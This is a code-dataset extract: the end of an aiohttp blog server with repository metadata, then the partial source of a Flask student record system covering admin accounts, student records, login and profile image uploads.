        template_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'templates')
    logging.info('set jinja2 template path: %s' % template_dir)
    env = Environment(loader=FileSystemLoader(template_dir), **opts)
    for name, f in (kw.get('filters') or {}).items():
        env.filters[name] = f
    app['__templating__'] = env
@asyncio.coroutine
def logger_factory(app, handler):
    """Middleware factory: log each request's method and path, then dispatch."""
    @asyncio.coroutine
    def logger(request):
        logging.info('Request: %s %s' % (request.method, request.path))
        result = yield from handler(request)
        return result
    return logger
@asyncio.coroutine
def auth_factory(app, handler):
    """Middleware factory: resolve the session cookie into request.__user__.

    Requests to /manage/* are redirected to /signin unless the resolved
    user exists and has the admin flag set.
    """
    @asyncio.coroutine
    def auth(request):
        logging.info('check user: %s %s' % (request.method, request.path))
        # Default to anonymous so handlers can always read request.__user__.
        request.__user__ = None
        cookie_str = request.cookies.get(COOKIE_NAME)
        if cookie_str:
            # cookie2user (project helper) validates the cookie and loads the user.
            user = yield from cookie2user(cookie_str)
            if user:
                logging.info('set current user: %s' % user.email)
                request.__user__ = user
        # Guard the admin area: only signed-in admin users may pass.
        if request.path.startswith('/manage/') and (request.__user__ is None or not request.__user__.admin):
            return web.HTTPFound('/signin')
        return (yield from handler(request))
    return auth
@asyncio.coroutine
def data_factory(app, handler):
    """Middleware factory: pre-parse POST bodies into request.__data__.

    JSON bodies are decoded with request.json(); HTML form posts with
    request.post(). Other content types are left for the handler.
    """
    @asyncio.coroutine
    def parse_data(request):
        if request.method == 'POST':
            if request.content_type.startswith('application/json'):
                request.__data__ = yield from request.json()
                logging.info('request json: %s' % str(request.__data__))
            # Fixed: the content type was misspelled 'x-www-from-urlencoded',
            # so standard HTML form posts were never parsed by this branch.
            elif request.content_type.startswith('application/x-www-form-urlencoded'):
                request.__data__ = yield from request.post()
                logging.info('request form: %s' % str(request.__data__))
        return (yield from handler(request))
    return parse_data
@asyncio.coroutine
def response_factory(app, handler):
    """Middleware factory: convert a handler's return value into a web.Response.

    Dispatches on the return type, in order: StreamResponse (pass-through),
    bytes (octet-stream), str ('redirect:' prefix or HTML), dict (JSON, or a
    rendered template when '__template__' is set), int status code,
    (status, message) tuple, and finally plain-text repr as a fallback.
    """
    @asyncio.coroutine
    def response(request):
        logging.info('Response handler...')
        r = yield from handler(request)
        # Already a full response object — pass through untouched.
        if isinstance(r, web.StreamResponse):
            return r
        if isinstance(r, bytes):
            resp = web.Response(body = r)
            resp.content_type = 'application/octet-stream'
            return resp
        if isinstance(r, str):
            # 'redirect:<url>' is this app's convention for an HTTP redirect.
            if r.startswith('redirect:'):
                return web.HTTPFound(r[9:])
            resp = web.Response(body = r.encode('utf-8'))
            resp.content_type = 'text/html;charset=utf-8'
            return resp
        if isinstance(r, dict):
            template = r.get('__template__')
            if template is None:
                # No template: serialize the dict as JSON; objects fall back
                # to their __dict__ via the default= hook.
                resp = web.Response(body = json.dumps(r, ensure_ascii = False, default = lambda o:o.__dict__).encode('utf-8'))
                resp.content_type = 'application/json;charset=utf-8'
                return resp
            else:
                # Template render: expose the current user to every template.
                r['__user__'] = request.__user__
                resp = web.Response(body = app['__templating__'].get_template(template).render(**r).encode('utf-8'))
                resp.content_type = 'text/html;charset=utf-8'
                return resp
        # NOTE(review): web.Response(r) / web.Response(t, str(m)) pass the
        # status positionally; modern aiohttp makes these keyword-only
        # (status=..., body=...) — confirm against the pinned aiohttp version.
        if isinstance(r, int) and r >= 100 and r < 600:
            return web.Response(r)
        if isinstance(r, tuple) and len(r) == 2:
            t, m = r
            if isinstance(t, int) and t >= 100 and t < 600:
                return web.Response(t, str(m))
        # default: anything else is rendered as plain text.
        resp = web.Response(body = str(r).encode('utf-8'))
        resp.content_type = 'text/plain;charset=utf-8'
        return resp
    return response
def datetime_filter(t):
    """Jinja2 filter: render unix timestamp t as a relative Chinese time string.

    Under a minute: '1分钟前'; then minutes/hours/days ago; older than a week:
    an absolute 'YYYY年M月D日' date.
    """
    age = int(time.time() - t)
    if age < 60:
        return u'1分钟前'
    # (upper bound in seconds, seconds per unit, unit label)
    for upper, unit_seconds, unit in (
        (3600, 60, u'分钟'),
        (86400, 3600, u'小时'),
        (604800, 86400, u'天'),
    ):
        if age < upper:
            return u'%s%s前' % (age // unit_seconds, unit)
    when = datetime.fromtimestamp(t)
    return u'%s年%s月%s日' % (when.year, when.month, when.day)
@asyncio.coroutine
def init(loop):
    """Create the DB pool, assemble the aiohttp app, and start the HTTP server.

    Returns the created server object so the caller can keep it alive.
    NOTE(review): data_factory is defined above but not registered in the
    middleware chain — confirm whether that is intentional.
    """
    yield from orm.create_pool(loop = loop, **configs.db)
    app = web.Application(loop = loop, middlewares = [
        logger_factory, auth_factory, response_factory
    ])
    # Register the datetime filter used by templates, the URL handlers
    # from the 'handlers' module, and the static file route.
    init_jinja2(app, filters = dict(datetime = datetime_filter))
    add_routes(app, 'handlers')
    add_static(app)
    srv = yield from loop.create_server(app.make_handler(), '0.0.0.0', 9000)
    # NOTE(review): the logged URL is a hard-coded public IP, while the bind
    # address is 0.0.0.0 — the log message may not match the real host.
    logging.info('server started at http://106.14.214.217:9000...')
    return srv
# Bootstrap: run init() on the default event loop, then serve forever.
loop = asyncio.get_event_loop()
loop.run_until_complete(init(loop))
loop.run_forever()
|
[
"ftong@163.com"
] |
ftong@163.com
|
42ea67672912de1d7477f0b55d7adcd814a121da
|
9b2d0ccde021cec80b41a65b58ebbe1cf7ba864b
|
/app.py
|
c249e97a2535ec32e0e23798dc249af65e85d0fe
|
[
"MIT"
] |
permissive
|
kunleh/SRS
|
0110ae729cfa6e8a3bd7e3be4afa8b036b67baec
|
23081061300a0df04c933e9671cf5a05b5c2a6d1
|
refs/heads/master
| 2021-04-30T03:19:38.094087
| 2017-09-24T17:32:07
| 2017-09-24T17:32:07
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 46,448
|
py
|
'''
App: Student Record System
Stack: Python(Flask), SQLite, HTML, CSS(Bootstrap), Javascript(JQuery)
Author: Ahmed Noor
'''
### Imports
from flask import Flask, flash, redirect, render_template, request, session, url_for, jsonify, g
from flask_compress import Compress
import sqlalchemy
from cs50 import SQL
from passlib.hash import sha256_crypt
import operator
import uuid
from werkzeug import secure_filename
import os, sys
### CS50 wrapper for SQLAlchemy
class SQL(object):
    """Wrap SQLAlchemy to provide a simple SQL API."""
    def __init__(self, url):
        """
        Create instance of sqlalchemy.engine.Engine.
        URL should be a string that indicates database dialect and connection arguments.
        http://docs.sqlalchemy.org/en/latest/core/engines.html#sqlalchemy.create_engine
        """
        try:
            self.engine = sqlalchemy.create_engine(url)
        except Exception as e:
            # Normalize any engine-creation failure into a RuntimeError.
            raise RuntimeError(e)
    def execute(self, text, *multiparams, **params):
        """
        Execute a SQL statement.

        Returns a list of dicts for row-returning statements, the new row's
        primary key for INSERT, the affected row count for UPDATE/DELETE,
        and None when a constraint is violated.
        """
        try:
            # bind parameters before statement reaches database, so that bound parameters appear in exceptions
            # http://docs.sqlalchemy.org/en/latest/core/sqlelement.html#sqlalchemy.sql.expression.text
            # https://groups.google.com/forum/#!topic/sqlalchemy/FfLwKT1yQlg
            # http://docs.sqlalchemy.org/en/latest/core/connections.html#sqlalchemy.engine.Engine.execute
            # http://docs.sqlalchemy.org/en/latest/faq/sqlexpressions.html#how-do-i-render-sql-expressions-as-strings-possibly-with-bound-parameters-inlined
            # NOTE(review): literal_binds inlines the parameter values into the
            # SQL string before execution, bypassing driver-level parameter
            # binding — verify quoting is safe for all inputs this app accepts.
            statement = sqlalchemy.text(text).bindparams(*multiparams, **params)
            result = self.engine.execute(str(statement.compile(compile_kwargs={"literal_binds": True})))
            # if SELECT (or INSERT with RETURNING), return result set as list of dict objects
            if result.returns_rows:
                rows = result.fetchall()
                return [dict(row) for row in rows]
            # if INSERT, return primary key value for a newly inserted row
            elif result.lastrowid is not None:
                return result.lastrowid
            # if DELETE or UPDATE (or INSERT without RETURNING), return number of rows matched
            else:
                return result.rowcount
        # if constraint violated, return None
        except sqlalchemy.exc.IntegrityError:
            return None
        # else raise error
        except Exception as e:
            raise RuntimeError(e)
### configure flask: create the app, enable response compression, and set
### the session secret and the set of accepted upload extensions.
app = Flask(__name__)
Compress(app)
# NOTE(review): the secret key is regenerated on every process start, which
# invalidates all existing sessions on each restart — confirm this is intended.
app.secret_key = uuid.uuid4().hex
app.config['ALLOWED_EXTENSIONS'] = set(['png', 'PNG', 'jpg', 'JPG', 'jpeg', 'JPEG', 'ico', 'ICO'])
### File type confirmation
def allowed_file(filename):
    """Return True when filename has an extension in app.config['ALLOWED_EXTENSIONS'].

    The comparison is now case-insensitive: the allowed set already lists both
    all-lower and all-upper spellings (indicating case-insensitive intent), but
    mixed-case extensions such as 'Png' were previously rejected.
    """
    return '.' in filename and \
           filename.rsplit('.', 1)[1].lower() in app.config['ALLOWED_EXTENSIONS']
### Convert string to int type possibility confirmation
def RepresentsInt(s):
    """Return True when s parses as an integer with int(), False otherwise."""
    try:
        int(s)
    except ValueError:
        return False
    return True
### configure root directory path relative to this file
# When frozen by a bundler (sys.frozen set), paths are resolved relative to
# the executable; otherwise relative to this source file.
THIS_FOLDER_G = ""
if getattr(sys, 'frozen', False):
    # frozen
    THIS_FOLDER_G = os.path.dirname(sys.executable)
else:
    # unfrozen
    THIS_FOLDER_G = os.path.dirname(os.path.realpath(__file__))
### configure CS50 Library to use SQLite database
db = SQL("sqlite:///" + THIS_FOLDER_G + "/db/system.db")
### Disable cache
@app.after_request
def add_header(r):
    """Attach no-cache headers to every response so browsers always revalidate.

    The final Cache-Control value is 'public, max-age=0' (the second
    assignment overwrites the first, as in the original).
    """
    for header_name, header_value in (
        ("Cache-Control", "no-cache, no-store, must-revalidate"),
        ("Pragma", "no-cache"),
        ("Expires", "0"),
        ("Cache-Control", "public, max-age=0"),
    ):
        r.headers[header_name] = header_value
    return r
### Store current session to global variable "g"
@app.before_request
def before_request():
g.systemsettings = {}
systemsettings = db.execute("SELECT * FROM systemsettings WHERE id=:id", id=1)
g.systemsettings["institutionname"] = systemsettings[0]["institutionname"]
g.systemsettings["icoURL"] = systemsettings[0]["icoURL"]
g.systemsettings["pngURL"] = systemsettings[0]["pngURL"]
g.systemsettings["jpgURL"] = systemsettings[0]["jpgURL"]
g.systemsettings["nameinheader"] = systemsettings[0]["nameinheader"]
g.systemsettings["logoinheader"] = systemsettings[0]["logoinheader"]
g.user = None
g.firstname = None
g.lastname = None
g.role = None
g.logged_in = None
if "user" in session:
g.user = session["user"]
g.username = session["username"]
g.firstname = session["firstname"]
g.lastname = session["lastname"]
g.role = session["role"]
g.logged_in = session["logged_in"]
### Root
@app.route("/")
def index():
    """Send signed-in visitors to the dashboard, everyone else to login."""
    target = "home" if g.user else "login"
    return redirect(url_for(target))
### Home
@app.route("/home")
def home():
    """Dashboard: show counts of active students and of admins (excluding one root account)."""
    if not g.user:
        return redirect(url_for("login"))
    active_students = db.execute("SELECT * FROM students WHERE status=:status", status="Active")
    all_admins = db.execute("SELECT * FROM admins")
    return render_template("home.html", numofstudents=len(active_students), numofadmins=(len(all_admins) - 1))
'''
Login/Logout
'''
### Login
@app.route("/login", methods=["GET", "POST"])
def login():
    """GET: render the login form. POST: verify credentials and start a session."""
    if request.method == "GET":
        return render_template("login.html")
    elif request.method == "POST":
        username = request.form["username"]
        password = request.form["password"]
        users = db.execute("SELECT * FROM admins WHERE username=:username", username=username)
        if len(users) > 0:
            # Passwords are stored as sha256_crypt hashes; verify() performs
            # the salted comparison.
            if users[0]["username"] == username and sha256_crypt.verify(password, users[0]["password"]) == True:
                # Drop any stale session values before installing the new identity.
                session.pop("user", None)
                session.pop("username", None)
                session.pop("firstname", None)
                session.pop("lastname", None)
                session.pop("role", None)
                session.pop("logged_in", None)
                session["user"] = str(users[0]["id"])
                session["username"] = users[0]["username"]
                session["firstname"] = users[0]["firstname"]
                session["lastname"] = users[0]["lastname"]
                session["role"] = users[0]["role"]
                session["logged_in"] = True
                return redirect(url_for("home"))
            else:
                # Same message for unknown user and wrong password
                # (avoids username probing).
                return render_template("login.html", error="Invalid Username or Password.")
        else:
            return render_template("login.html", error="Invalid Username or Password.")
### Logout
@app.route("/logout")
def logout():
    """Clear every session key and return to the login page."""
    for session_key in ("user", "username", "firstname", "lastname", "role", "logged_in"):
        session.pop(session_key, None)
    return redirect(url_for("login"))
'''
Administrators
'''
### Main administrators page
@app.route("/administrators")
def administrators():
    """Render the admin management page; accessible to root only."""
    if g.user and g.role == "root":
        return render_template("administrators.html")
    return redirect(url_for("home"))
### Get admins data via ajax to show on main administrators page
@app.route("/getadmins", methods=["GET", "POST"])
def getadmins():
    """Return all admin rows as JSON, sorted by first name, minus the caller.

    Root-only; everyone else is redirected home.
    """
    if g.user and g.role == "root":
        admins = db.execute("SELECT * FROM admins")
        # Case-insensitive sort by first name.
        admins = sorted(admins, key=lambda k: str.lower(k["firstname"]))
        # Remove the currently signed-in admin from the listing
        # (only the first match — usernames are assumed unique).
        for i in range(len(admins)):
            if admins[i]["username"] == g.username:
                admins.pop(i)
                break
        return jsonify(admins)
    else:
        return redirect(url_for("home"))
### Save admin info via ajax
@app.route("/saveadmininfo", methods=["GET", "POST"])
def saveadmininfo():
    """Update an existing admin's profile fields, avatar, and (optionally) password.

    Root-only. Rejects a username already used by a different admin and
    unsupported avatar file types. Responds with a JSON status/message pair.
    NOTE(review): local name `id` shadows the builtin; GET requests by root
    fall through and return None (a 500 in Flask) — confirm intended.
    """
    if g.user and g.role == "root":
        if request.method == "POST":
            id = request.values.get("id")
            firstname = request.values.get("firstname")
            lastname = request.values.get("lastname")
            username = request.values.get("username")
            password = request.values.get("password")
            contact = request.values.get("contact")
            role = request.values.get("role")
            image = request.files["imgURL"]
            admins = db.execute("SELECT * FROM admins")
            # Uniqueness check: the new username may not belong to another admin.
            for i in range(len(admins)):
                if admins[i]["username"] == username and admins[i]["id"] != int(id):
                    return jsonify([{"status": "error", "msg": "Username already taken."}])
            if image:
                if allowed_file(image.filename) == True:
                    # New avatar is stored as admin_<id>.<ext>; the old file
                    # (possibly with a different extension) is removed first.
                    imagename = image.filename
                    imageext = imagename.split(".")[-1]
                    imagename = "admin_" + str(id) + "." + imageext
                    imgExt = db.execute("SELECT * FROM admins WHERE id=:id", id=int(id))
                    imgExt = imgExt[0]["imgURL"]
                    imgExt = imgExt.split(".")
                    imgExt = imgExt[-1]
                    try:
                        os.remove(os.path.join(THIS_FOLDER_G + "/static/img/db/admins/", "admin_" + id + "." + imgExt))
                    # Best-effort delete: a missing old avatar is not an error.
                    except:
                        pass
                    image.save(os.path.join(THIS_FOLDER_G + "/static/img/db/admins/", imagename))
                    imgURL = "../static/img/db/admins/" + imagename
                    db.execute("UPDATE admins SET imgURL=:imgURL WHERE id=:id", imgURL=imgURL, id=int(id))
                else:
                    return jsonify([{"status": "error", "msg": "File extension not supported."}])
            # Persist the remaining profile fields one column at a time.
            db.execute("UPDATE admins SET firstname=:firstname WHERE id=:id", firstname=firstname, id=int(id))
            db.execute("UPDATE admins SET lastname=:lastname WHERE id=:id", lastname=lastname, id=int(id))
            db.execute("UPDATE admins SET username=:username WHERE id=:id", username=username, id=int(id))
            db.execute("UPDATE admins SET contact=:contact WHERE id=:id", contact=contact, id=int(id))
            db.execute("UPDATE admins SET role=:role WHERE id=:id", role=role, id=int(id))
            # Empty password field means "leave the password unchanged".
            if password != "":
                db.execute("UPDATE admins SET password=:password WHERE id=:id", password=sha256_crypt.hash(password), id=int(id))
            return jsonify([{"status": "success", "msg": "Changes saved."}])
    else:
        return redirect(url_for("home"))
### Add admin info via ajax
@app.route("/addnewadmin", methods=["GET", "POST"])
def addnewadmin():
    """Create a new admin account (root-only), with an optional avatar upload.

    Validates required fields and username uniqueness, then inserts the row;
    when an avatar is supplied it is saved as admin_<new id>.<ext> and the
    row's imgURL is updated. Responds with a JSON status/message pair.
    NOTE(review): `oldpassword` is read but never used here.
    """
    if g.user and g.role == "root":
        if request.method == "POST":
            firstname = request.values.get("firstname")
            lastname = request.values.get("lastname")
            username = request.values.get("username")
            oldpassword = request.values.get("oldpassword")
            password = request.values.get("password")
            contact = request.values.get("contact")
            role = request.values.get("role")
            image = request.files["imgURL"]
            admins = db.execute("SELECT * FROM admins")
            # Required-field validation.
            if firstname == "" or lastname == "" or username == "" or password == "":
                return jsonify([{"status": "error", "msg": "Incomplete Details."}])
            # Username must be unique across all admins.
            for i in range(len(admins)):
                if admins[i]["username"] == username:
                    return jsonify([{"status": "error", "msg": "Username already taken."}])
            # Default avatar, used when no image is uploaded.
            imgURL = "../static/img/system/default-prof-img.png"
            if image:
                if allowed_file(image.filename) == True:
                    # Insert first to obtain the new row's id, then name the
                    # avatar file after it and point imgURL at the saved file.
                    db.execute("INSERT INTO admins (username, firstname, lastname, password, role, contact, imgURL) VALUES (:username, :firstname, :lastname, :password, :role, :contact, :imgURL)", username=username, firstname=firstname, lastname=lastname, password=sha256_crypt.hash(password), role=role, contact=contact, imgURL=imgURL)
                    newuser = db.execute("SELECT * FROM admins WHERE username=:username", username=username)
                    imagename = image.filename
                    imageext = imagename.split(".")[-1]
                    imagename = "admin_" + str(newuser[0]["id"]) + "." + imageext
                    image.save(os.path.join(THIS_FOLDER_G + "/static/img/db/admins/", imagename))
                    imgURL = "../static/img/db/admins/" + imagename
                    db.execute("UPDATE admins SET imgURL=:imgURL WHERE id=:id", imgURL=imgURL, id=newuser[0]["id"])
                else:
                    return jsonify([{"status": "error", "msg": "File extension not supported."}])
            else:
                db.execute("INSERT INTO admins (username, firstname, lastname, password, role, contact, imgURL) VALUES (:username, :firstname, :lastname, :password, :role, :contact, :imgURL)", username=username, firstname=firstname, lastname=lastname, password=sha256_crypt.hash(password), role=role, contact=contact, imgURL=imgURL)
            return jsonify([{"status": "success", "msg": "Changes saved."}])
    else:
        return redirect(url_for("home"))
### Delete admin via ajax
@app.route("/deleteadmin", methods=["GET", "POST"])
def deleteadmin():
    """Delete an admin (root-only): remove the avatar file and the DB row.

    Responds with a JSON status/message pair including the deleted admin's name.
    Fixed: previously, when the posted id matched no admin, `firstname` and
    `lastname` were never bound and the jsonify call raised NameError (a 500);
    an explicit JSON error is returned instead. The bare `except:` around the
    avatar delete is narrowed to OSError so it only swallows file errors.
    """
    if g.user and g.role == "root":
        if request.method == "POST":
            admin_id = request.values.get("id")
            # Locate the admin row to delete.
            target = None
            for admin in db.execute("SELECT * FROM admins"):
                if admin["id"] == int(admin_id):
                    target = admin
                    break
            if target is None:
                return jsonify([{"status": "error", "msg": "Admin not found."}])
            # Remove the stored avatar; a missing file is not an error.
            imgExt = target["imgURL"].split(".")[-1]
            try:
                os.remove(os.path.join(THIS_FOLDER_G + "/static/img/db/admins/", "admin_" + admin_id + "." + imgExt))
            except OSError:
                pass
            db.execute("DELETE FROM admins WHERE id=:id", id=int(admin_id))
            return jsonify([{"status": "success", "msg": "Deleted", "firstname": target["firstname"], "lastname": target["lastname"]}])
    else:
        return redirect(url_for("home"))
'''
User profile of the currently logged in user(admin)
'''
### Show currently logged in user's profile
@app.route("/userprofile", methods=["GET", "POST"])
def userprofile():
    """Render the profile page for the signed-in admin."""
    if not g.user:
        return redirect(url_for("home"))
    return render_template("userprofile.html")
### Get currently logged in user's data via ajax to view on user profile
@app.route("/getuserprofile", methods=["GET", "POST"])
def getuserprofile():
    """Return the signed-in admin's database row as JSON."""
    if not g.user:
        return redirect(url_for("home"))
    return jsonify(db.execute("SELECT * FROM admins where id=:id", id=int(g.user)))
### Save user profile changes via ajax
@app.route("/saveuserprofile", methods=["GET", "POST"])
def saveuserprofile():
    """Persist profile edits for the currently logged-in admin (AJAX endpoint).

    Rejects duplicate usernames, handles an optional password change (the old
    password must verify against the stored sha256_crypt hash) and an optional
    profile-image replacement, then updates the basic fields and refreshes the
    session values so the UI shows the new name immediately.
    """
    if g.user:
        if request.method == "POST":
            id = request.values.get("id")
            firstname = request.values.get("firstname")
            lastname = request.values.get("lastname")
            username = request.values.get("username")
            oldpassword = request.values.get("oldpassword")
            password = request.values.get("password")
            confirmpassword = request.values.get("confirmpassword")
            contact = request.values.get("contact")
            image = request.files["imgURL"]
            admins = db.execute("SELECT * FROM admins")
            # Username must be unique across all other admins.
            for i in range(len(admins)):
                if admins[i]["username"] == username and admins[i]["id"] != int(id):
                    return jsonify([{"status": "error", "msg": "Username already taken."}])
            users = db.execute("SELECT * FROM admins WHERE id=:id", id=int(g.user))
            # Empty password field means "leave password unchanged".
            if password != "":
                if password != confirmpassword:
                    return jsonify([{"status": "error", "msg": "Confirm new password."}])
                if sha256_crypt.verify(oldpassword, users[0]["password"]) == True:
                    db.execute("UPDATE admins SET password=:password WHERE id=:id", password=sha256_crypt.hash(password), id=int(id))
                else:
                    return jsonify([{"status": "error", "msg": "Old password did not match."}])
            if image:
                if allowed_file(image.filename) == True:
                    # Save the new image as admin_<id>.<ext>; remove the previous
                    # file first since it may have a different extension.
                    imagename = image.filename
                    imageext = imagename.split(".")[-1]
                    imagename = "admin_" + str(id) + "." + imageext
                    imgExt = db.execute("SELECT * FROM admins WHERE id=:id", id=int(id))
                    imgExt = imgExt[0]["imgURL"]
                    imgExt = imgExt.split(".")
                    imgExt = imgExt[-1]
                    try:
                        os.remove(os.path.join(THIS_FOLDER_G + "/static/img/db/admins/", "admin_" + id + "." + imgExt))
                    except:
                        pass
                    image.save(os.path.join(THIS_FOLDER_G + "/static/img/db/admins/", imagename))
                    imgURL = "../static/img/db/admins/" + imagename
                    db.execute("UPDATE admins SET imgURL=:imgURL WHERE id=:id", imgURL=imgURL, id=int(id))
                else:
                    return jsonify([{"status": "error", "msg": "File extension not supported."}])
            db.execute("UPDATE admins SET firstname=:firstname WHERE id=:id", firstname=firstname, id=int(id))
            db.execute("UPDATE admins SET lastname=:lastname WHERE id=:id", lastname=lastname, id=int(id))
            db.execute("UPDATE admins SET username=:username WHERE id=:id", username=username, id=int(id))
            db.execute("UPDATE admins SET contact=:contact WHERE id=:id", contact=contact, id=int(id))
            users = db.execute("SELECT * FROM admins WHERE id=:id", id=int(g.user))
            # Refresh session copies of the display fields.
            if len(users) > 0:
                session["username"] = users[0]["username"]
                session["firstname"] = users[0]["firstname"]
                session["lastname"] = users[0]["lastname"]
                session["role"] = users[0]["role"]
            return jsonify([{"status": "success", "msg": "Changes saved."}])
    else:
        return redirect(url_for("home"))
'''
Students
'''
### Main students page. View all currently active students
@app.route("/students")
def students():
    """List all active students, alphabetised by first name."""
    if not g.user:
        return redirect(url_for("home"))
    roster = db.execute("SELECT * FROM students WHERE status=:status", status="Active")
    roster.sort(key=lambda row: row["firstname"].lower())
    return render_template("students.html", students=roster)
### Main students page. View all currently inactive students
@app.route("/students/inactive")
def inactivestudents():
    """List all inactive students, alphabetised by first name."""
    if not g.user:
        return redirect(url_for("home"))
    roster = db.execute("SELECT * FROM students WHERE status=:status", status="Inactive")
    roster.sort(key=lambda row: row["firstname"].lower())
    return render_template("students.html", students=roster, inactive=True)
### View th profile of a specific student based on student ID
@app.route("/studentprofile/<id>")
def studentprofile(id):
    """Show one student's profile page, or a not-found page for unknown ids."""
    if not g.user:
        return redirect(url_for("home"))
    rows = db.execute("SELECT * FROM students WHERE id=:id", id=int(id))
    if not rows:
        return render_template("notfound.html", msg="Student Not Found.")
    record = rows[0]
    # Inactive students get an extra flag so the template can show a banner.
    if record["status"] == "Inactive":
        return render_template("studentprofile.html", student=record, inactive=True)
    return render_template("studentprofile.html", student=record)
### Get student data via ajax to view on student profile based on student ID
@app.route("/getstudentprofile/<id>")
def getstudentprofile(id):
    """Return one student's row as JSON (AJAX helper for the profile page)."""
    if not g.user:
        return redirect(url_for("home"))
    rows = db.execute("SELECT * FROM students WHERE id=:id", id=int(id))
    if not rows:
        return render_template("notfound.html", msg="Student Not Found.")
    return jsonify(rows)
### Save student data changes via ajax based on student ID
@app.route("/savestudentinfo/<id>", methods=["GET", "POST"])
def savestudentinfo(id):
    """Persist edits to an existing student record (AJAX endpoint).

    Validates that all fields are present and the status is Active/Inactive,
    optionally replaces the stored profile image (deleting the old file),
    then updates every column and returns a JSON status payload.
    """
    if g.user:
        if request.method == "POST":
            id = id
            firstname = request.values.get("firstname")
            lastname = request.values.get("lastname")
            fathername = request.values.get("fathername")
            contact = request.values.get("contact")
            gender = request.values.get("gender")
            dob = request.values.get("dob")
            address = request.values.get("address")
            class_ = request.values.get("class")
            admissiondate = request.values.get("admissiondate")
            monthlyfee = request.values.get("monthlyfee")
            status = request.values.get("status")
            image = request.files["imgURL"]
            student = db.execute("SELECT * FROM students WHERE id=:id", id=int(id))
            if firstname == "" or lastname == "" or fathername == "" or contact == "" or gender == "" or dob == "" or address == "" or class_ == "" or admissiondate == "" or monthlyfee == "" or status == "":
                return jsonify([{"status": "error", "msg": "Incomplete Details."}])
            if len(student) < 1:
                return jsonify([{"status": "error", "msg": "Student does not exist."}])
            if status != "Active" and status != "Inactive":
                return jsonify([{"status": "error", "msg": "Invalid status."}])
            if image:
                if allowed_file(image.filename) == True:
                    # Save the new image as student_<id>.<ext>; remove the old file
                    # first since it may carry a different extension.
                    imagename = image.filename
                    imageext = imagename.split(".")[-1]
                    imagename = "student_" + str(id) + "." + imageext
                    imgExt = db.execute("SELECT * FROM students WHERE id=:id", id=int(id))
                    imgExt = imgExt[0]["imgURL"]
                    imgExt = imgExt.split(".")
                    imgExt = imgExt[-1]
                    try:
                        os.remove(os.path.join(THIS_FOLDER_G + "/static/img/db/students/", "student_" + id + "." + imgExt))
                    except:
                        pass
                    image.save(os.path.join(THIS_FOLDER_G + "/static/img/db/students/", imagename))
                    imgURL = "../static/img/db/students/" + imagename
                    db.execute("UPDATE students SET imgURL=:imgURL WHERE id=:id", imgURL=imgURL, id=int(id))
                else:
                    return jsonify([{"status": "error", "msg": "File extension not supported."}])
            # One UPDATE per column (mirrors the style used elsewhere in this file).
            db.execute("UPDATE students SET firstname=:firstname WHERE id=:id", firstname=firstname, id=int(id))
            db.execute("UPDATE students SET lastname=:lastname WHERE id=:id", lastname=lastname, id=int(id))
            db.execute("UPDATE students SET fathername=:fathername WHERE id=:id", fathername=fathername, id=int(id))
            db.execute("UPDATE students SET contact=:contact WHERE id=:id", contact=contact, id=int(id))
            db.execute("UPDATE students SET gender=:gender WHERE id=:id", gender=gender, id=int(id))
            db.execute("UPDATE students SET dob=:dob WHERE id=:id", dob=dob, id=int(id))
            db.execute("UPDATE students SET address=:address WHERE id=:id", address=address, id=int(id))
            db.execute("UPDATE students SET class=:class_ WHERE id=:id", class_=class_, id=int(id))
            db.execute("UPDATE students SET admissiondate=:admissiondate WHERE id=:id", admissiondate=admissiondate, id=int(id))
            db.execute("UPDATE students SET monthlyfee=:monthlyfee WHERE id=:id", monthlyfee=int(monthlyfee), id=int(id))
            db.execute("UPDATE students SET status=:status WHERE id=:id", status=status, id=int(id))
            student = db.execute("SELECT * FROM students WHERE id=:id", id=int(id))
            return jsonify([{"status": "success", "msg": "Changes saved."}])
    else:
        return redirect(url_for("home"))
### Add new student via ajax
@app.route("/addnewstudent", methods=["GET", "POST"])
def addnewstudent():
    """Create a new student record from an AJAX form post.

    Validates the form, inserts the row, and — when a profile image was
    uploaded — saves it as ``student_<id>.<ext>`` and points the row's
    ``imgURL`` at it.  Returns a JSON status payload.

    Fixes: removed an unused query result, and replaced an O(n^2) nested scan
    for the newest row (whose final assignment always resolved to the last
    element anyway) with a direct last-row lookup.
    """
    if g.user:
        if request.method == "POST":
            firstname = request.values.get("firstname")
            lastname = request.values.get("lastname")
            fathername = request.values.get("fathername")
            contact = request.values.get("contact")
            gender = request.values.get("gender")
            dob = request.values.get("dob")
            address = request.values.get("address")
            class_ = request.values.get("class")
            admissiondate = request.values.get("admissiondate")
            monthlyfee = request.values.get("monthlyfee")
            image = request.files["imgURL"]
            if firstname == "" or lastname == "" or fathername == "" or contact == "" or gender == "" or dob == "" or address == "" or class_ == "" or admissiondate == "" or monthlyfee == "":
                return jsonify([{"status": "error", "msg": "Incomplete Details."}])
            elif RepresentsInt(monthlyfee) != True:
                return jsonify([{"status": "error", "msg": "Incompatible Details."}])
            imgURL = "../static/img/system/default-prof-img.png"
            if image:
                if allowed_file(image.filename) == True:
                    db.execute("INSERT INTO students (firstname, lastname, fathername, contact, gender, dob, address, class, admissiondate, monthlyfee, imgURL) VALUES (:firstname, :lastname, :fathername, :contact, :gender, :dob, :address, :class_, :admissiondate, :monthlyfee, :imgURL)", firstname=firstname, lastname=lastname, fathername=fathername, contact=contact, gender=gender, dob=dob, address=address, class_=class_, admissiondate=admissiondate, monthlyfee=int(monthlyfee), imgURL=imgURL)
                    # Ids auto-increment, so the newly inserted student is the
                    # last row returned by the unordered SELECT used here.
                    students_ = db.execute("SELECT * FROM students")
                    student = students_[-1] if students_ else None
                    # Sanity-check the row really is the one we just inserted
                    # before renaming/saving the uploaded image after its id.
                    if student != None and student['firstname'] == firstname and student['lastname'] == lastname and student['fathername'] == fathername and student['gender'] == gender and student['dob'] == dob and student['address'] == address and student['class'] == class_ and student['admissiondate'] == admissiondate and student['monthlyfee'] == int(monthlyfee):
                        id = student['id']
                        imagename = image.filename
                        imageext = imagename.split(".")[-1]
                        imagename = "student_" + str(id) + "." + imageext
                        image.save(os.path.join(THIS_FOLDER_G + "/static/img/db/students/", imagename))
                        imgURL = "../static/img/db/students/" + imagename
                        db.execute("UPDATE students SET imgURL=:imgURL WHERE id=:id", imgURL=imgURL, id=int(id))
                else:
                    return jsonify([{"status": "error", "msg": "File extension not supported."}])
            else:
